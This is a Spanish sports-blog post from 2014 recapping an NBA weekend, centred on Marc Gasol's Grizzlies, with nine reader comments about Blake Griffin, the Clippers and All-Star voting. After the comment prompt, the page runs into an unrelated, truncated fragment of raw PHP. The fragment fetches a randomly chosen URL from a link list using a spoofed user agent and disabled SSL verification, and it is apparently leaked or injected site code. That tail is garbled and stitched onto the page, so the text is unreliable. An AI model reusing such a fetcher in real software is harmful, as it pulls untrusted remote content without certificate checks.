Informe del fin de semana: Marc Gasol guía a los Grizzlies

24 de November de 2014 por TheDeerHunter

El viernes tuvimos a Nacho en plan “Lone Ranger” del blog. Lo mismo te comentaba el Magic@Hornets que nos hablaba de la exhibición de Isiah Thomas frente a los Sixers o que nos daba las claves de la tercera debacle consecutiva de los Cavs de LeBron, esta vez frente a un señor equipo como es Washington. Si cobráramos sueldo, Nacho, esa noche te lo hubieras ganado con creces. Lo de la colecta para mandarte a pie de pista sería una idea excelente.

Evan Fournier se fue a los 21 puntos. Harris y Vucevic algo han mejorado, aunque un 11 de 33 en TC entre los dos. Eso sí, 26 rebotes.
Pero han sido Payton, Green y Gordon los que han dado la vuelta al partido, y el señor Vaughn los ha mantenido en la cancha, han ganado, y el resto del equipo una piña en el banquillo.(…) ‘chapeau’ al entrenador.” Nacho

A pesar de todas las tintas que se han cargado contra Vaughn su equipo se colaba este fin de semana en plaza de postemporada por delante de equipos como los propios Hornets que sobre el papel son superiores. Ellos son una de las decepciones de este principio de curso. O cambia la dinámica o Steve Clifford podría ver peligrar su puesto antes de Navidad. 

Como destacaba también Nacho en rabioso directo Isiah Thomas se la liaba a los Sixers y su equipo también dormía en zona playoffs. El nuevo fichaje de los de Arizona es el mejor jugador del equipo este primer mes de competición, algo extraordinario pues el listón estaba situado muy alto. También nos comentaba lo mal que pintaban los Cavs en su partido en Washington al final del tercer cuarto. Los de David Blatt acabaron cayendo ante un John Wall disfrazado de LeBron en modo MVP, destacando en puntos, rebotes, asistencias y robos. Cuidado con estos Wizards.

“Pobrecillos los OKC la de partidos que están perdiendo en los últimos segundos, dentro de lo malo, no obstante creo que les puede venir bien cuando vuelvan KD y RW, ya que se van a encontrar a gente como Telfair, Morrow ó Lance Thomas de los cuales no se esperaba nada, y han demostrado ser utiles aún.” Denise

Y es que los Thunder caían de dos contra los Nets, que tampoco están para tirar cohetes y que necesitaron que Jarrett Jack saliera al rescate desde el banco. Les ha mirado un tuerto al equipo de Scott Brooks.

“Buena lección para la defensa de los Bucks,no creo que haya que darles duro,son chavales jóvenes y están rindiendo por encima de las expectativas y de todo se aprende,incluso de palizas como las de esta noche.” Ruxixon

124 puntos encajaba el equipo de Jason Kidd contra unos Raptors en estado de gracia. Louis Williams cuajó el mejor partido de los últimos años. Pero podría haber sido peor, podrían haber sido los Lakers que encajaron 140 puntos en Dallas.

En el resto de jornada de viernes Jeff Teague y los Hawks ahondaron en la crisis de los Pistons; Marc Gasol y los Grizzlies doblegaron a los Celtics desde, oh noticia, el ataque; Tony Parker firmó su mejor actuación de lo que va de curso en Minneapolis, donde brilló por cierto Anthony Bennett; los Pelicans dieron un importante paso atrás en Denver ante unos Nuggets que parecen querer reaccionar, en cambio  los Warriors no sufrieron demasiado ante Utah con un buen partido de Andre Iguodala. Finalmente los Bulls cayeron en Portland, cuyo equipo parece intratable ahora mismo.

El sábado estuvistéis comentando el derbi de Florida, con un precioso duelo Chris Bosh vs Nikola Vucevic y una excelente actuación de Mario Chalmers que resultó decisiva para la victoria de Miami. Aunque lo más destacado fue la 4ª derrota consecutiva de los Cavs esta vez ante unos Raptors muy superiores comandados por un Louis Williams tocado por las musas. A Lebron James se le empieza a acabar la paciencia.

Los Knicks terminaron doblegando a Sixers (13 derrotas y subiendo) en el retorno de Jose Calderon al equipo y los Suns ganaron demasiado fácil en Indianapolis. Vimos actuaciones portentosas de Anthony Davis y Demarcus Cousins en las victorias de Pelicans y Kings ante Jazz y Wolves respectivamente. Los Rockets lograron una victoria de mucho valor ante Dallas de la mano de James Harden y a pesar de jugar sin Dwight Howard. Los Wizards ganaron a Bucks con un Paul Pierce como el de sus mejores tardes y los Spurs hicieron lo propio con los Nets.

Los Memphis Grizzlies ganaron ayer domingo a los Clipper en un partido que se convirtió en todo un clínic de baloncesto impartido por el mejor Marc Gasol de siempre. Su impresionante nivel explica en buena parte el liderato del equipo en la Conferencia Oeste. No pierden comba los Warriors que se deshicieron de unos correosos Thunder que no dan nunca su brazo a torcer pero que acaban perdiendo casi siempre. También se mantienen al acecho los Blazers que encadenan su séptima victoria consecutiva en Boston, ciudad donde inician un periodo de 30 días de competición con 13 partidos fuera de casa que marcará su devenir esta temporada.

En el partido de las urgencias los Heat se impusieron a unos Bobcats que sufren siempre en los finales de los partidos. Luol Deng estuvo sublime y la ayuda de Bosh y Chalmers fue suficiente. En el último partido de la noche victoria en la prórroga de unos Nuggets que encadenan 4 victorias consecutivas. Los Lakers, en cambio, se hunden más y más en el fondo del Oeste.

Comenta

9 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    No sé si estadísticamente se reflejará pero Blake Griffin parece un escalón por debajo de aquel jugador ultrafísico,como queriendo refinarse desde la media distancia y alejándose de ser aquel jugador que por sus aptitudes físicas dominaba cerca del aro.Un pequeño paso atrás que decepciona al mismo tiempo que los Clippers,y no es sólo su partido contra Memphis,que con esos bicharracos y esa solidaridad defensiva te sacan del partido,hablo de una línea general en esta temporada.

      Citar

  2. Futurman dice:
    #2

    Blake tiene que tener problemas físicos, cuando L.A juegan para CPaul todo el rato es por eso; por que a Griffin no le da. Es más, pocos partidos dignos lleva en lo que va de temporada.

      Citar

  3. Nacho dice:
    #3

    El tema Griffin me sugiere una reflexión.
    Se está imponiendo, cada vez con más fuerza, el equipo. Tras la aparición de LeBron (que aunque no me guste tengo que decir que es un monstruo de la naturaleza) se empezó a vislumbrar la llegada de un nuevo Jordan. Y un nuevo 23 (lo digo con toda la mala leche del mundo) no existe, Pero todo empezó a girar en torno al superjugador franquicia, y llevamos años con drafts en lo que se esperan, no magníficos jugadores, sino mesías. Griffin fue uno de ellos.
    Como decía antes estamos ante el equipo, además de una forma descarada, solo hay que ver quien domina hoy la NBA: Grizzlies, Raptors, Warriors… quienes están latentes Spurs, Bulls… (al loro con el equipito de los Wizards). También podemos repasar los últimos ganadores… San Antonio, Dallas, Boston, (incluso los L.A.)
    Dejo aparte el tema Miami. Cuatro años, dos anillos. el primer año, ko. Y de eso aprendieron, sobre todo LeBron. Spoelstra ha sido ninguneado muchas veces, pero construyó una defensa demencial (y eso no lo hace solo un superjugador franquicia), Con ese equipo y ese aprendizaje ganó el primer anillo. En el segundo aparecieron secundarios y la maravillosa mano de Allen, a la cuarta se dieron de bruces con el equipo con mayúsculas.
    Esa travesía inspiró la teoría de los big three, que de alguna manera apuntaban la idea de equipo, pero no lo terminaba siendo. Creo que se pueden contar por fracasos las ideas del Big Three surgidas después (el original de los Celtic’s campeones no era tal, aunque nos lo vendieran)
    LeBron lo sabe, y anda caminando en la búsqueda del equipo en Cleveland. Durant no sé aún si lo sabe (aunque su deseo de fichar a Pau pueda indicarnos que sí), y lesiones aparte, OKC no ha terminado de cuajar. Algo similar debe pasar en la acera pobre de LA, igual, lesiones aparte también, es ese cambio en el juego de Blake.
    La ceja está en periodo de afirmación, con lo cual los focos y los números no deben eclipsarnos, ni a él tampoco. A la hora de la verdad necesitará un equipo (lo va teniendo)
    Creo que esta teoría es la clave de la búsqueda de James en sus Cav’s.
    Yo disfruto, y además un huevo, viendo a Memphis, San Antonio, Toronto, y por qué no, también a Dallas (creo que uno de los mayores ejemplos de cracks conscientes de equipo es Dirk) y Chicago.

      Citar

  4. Azabel dice:
    #4

    Futurman:
    Blake tiene que tener problemas físicos, cuando L.A juegan para CPaul todo el rato es por eso; por que a Griffin no le da. Es más, pocos partidos dignos lleva en lo que va de temporada.

    como todos sabran no soy fanatico de Griffin ni mucho menos pero ha tenido partidos buenos y anotando sigue siendo peligrosisimo, si veo una merma constante año tras año en la tasa de rebotes, pero que es inversamente proporcional al incremenrto en el rubro que subre Jordan

    Los Clippers en mi opinion estan altamente sobrevalorados, es cierto que tienen una dupla estelar con CP3 y GRIFFIN pero ambos estan siendo menos que años anteriores, de hecho este año creo que los dos perderan su puesto de titulares en el all-star
    tambien tienen al mejor sexto hombre de la liga como Crawford,

    pero despues de ellos tres que?
    Redick no es mejor que la mayoria de los escoltas tirados de la liga, Barnes tiene demasiados años en la espalda, y Jordan rebotea y tapona como el mejor, pero todo lo demas lo hace como el peor
    Hawes, Farmar, etc buenos jugadores y poco mas

    es decir,. tienen buen equipo, son contendientes en el dificilisimo oeste, terminaran entre los 6 mejores de la conferencia y seguramente llegaran a segunda ronda, para mi ese es y ha sido siempre su techo

    decepción se llevan los que desde hace dos años que los ven como candidatos al anillo, para mi de ahi estan a un trecho

      Citar

  5. Futurman dice:
    #5

    Al AS va Griffin titular seguro, piensa que es por votación popular y el tío es carismático y da espectáculo. De Paul tengo dudas, Curry juega recital tras recital y si las cosas no cambian será titular -a priori-.

      Citar

  6. Denise dice:
    #6

    Futurman:
    Al AS va Griffin titular seguro, piensa que es por votación popular y el tío es carismático y da espectáculo. De Paul tengo dudas, Curry juega recital tras recital y si las cosas no cambian será titular -a priori-.

    Van los 2 seguro.
    Respecto a azabel/esteban, años anteriores si creo que tenían opciones a anillo, tenían una plantilla más profunda, y jugadores como Barnes o Crawford eran mas jovenes y no estaban tan quemados como ahora.
    Este año, a no ser que se saquen un traspaso de la manga o pillen a varios jugadores en condiciones mediante buy-out, no les doy ninguna opción a anillo, ni siquiera a cabezas de serie en playoffs.
    No quiero resultar ventajista, lo dije en la previa, Farmar en la vida va a superar el gran rendimiento de Collison. Willie Green y Dudley no eran grandes cosas, pero les daba bastante profundidad al equipo, Hawes me parece un jugador muy normalito que ha engordado numeros debido a los malos equipos donde ha jugado. Y con Glen Davis tenía esperanzas pero es un ex-jugador, al igual que Turkoglu.

      Citar

  7. Azabel dice:
    #7

    Denise: Van los 2 seguro.

    Sinceramente no creo que vayan los dos de titulares, curry y Kobe a este ritmo seran los guardias del oeste, y si no pasanada raro, davis o aldrigue y howard o cousins serian los centros

      Citar

  8. Futurman dice:
    #8

    Vamos a ver, los titulares en el All Stars se eligen por votación popular. No veo ningún ala-pivot/pivot/forguard más popular que Griffin, que seguro a Howard le saca mucho margen. Será un Curry, Bryant, durant, Griffin, Davis/Howard; o algo por el estilo. Paul si que tiene pinta a suplente a no ser que empiece a sacarsela y el equipo mejore.

      Citar

  9. Azabel dice:
    #9

    Futurman:
    Vamos a ver, los titulares en el All Stars se eligen por votación popular. No veo ningún ala-pivot/pivot/forguard más popular que Griffin, que seguro a Howard le saca mucho margen. Será un Curry, Bryant, durant, Griffin, Davis/Howard; o algo por el estilo. Paul si que tiene pinta a suplente a no ser que empiece a sacarsela y el equipo mejore.

    davis al banco? no te la creo de seguir esto asi

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>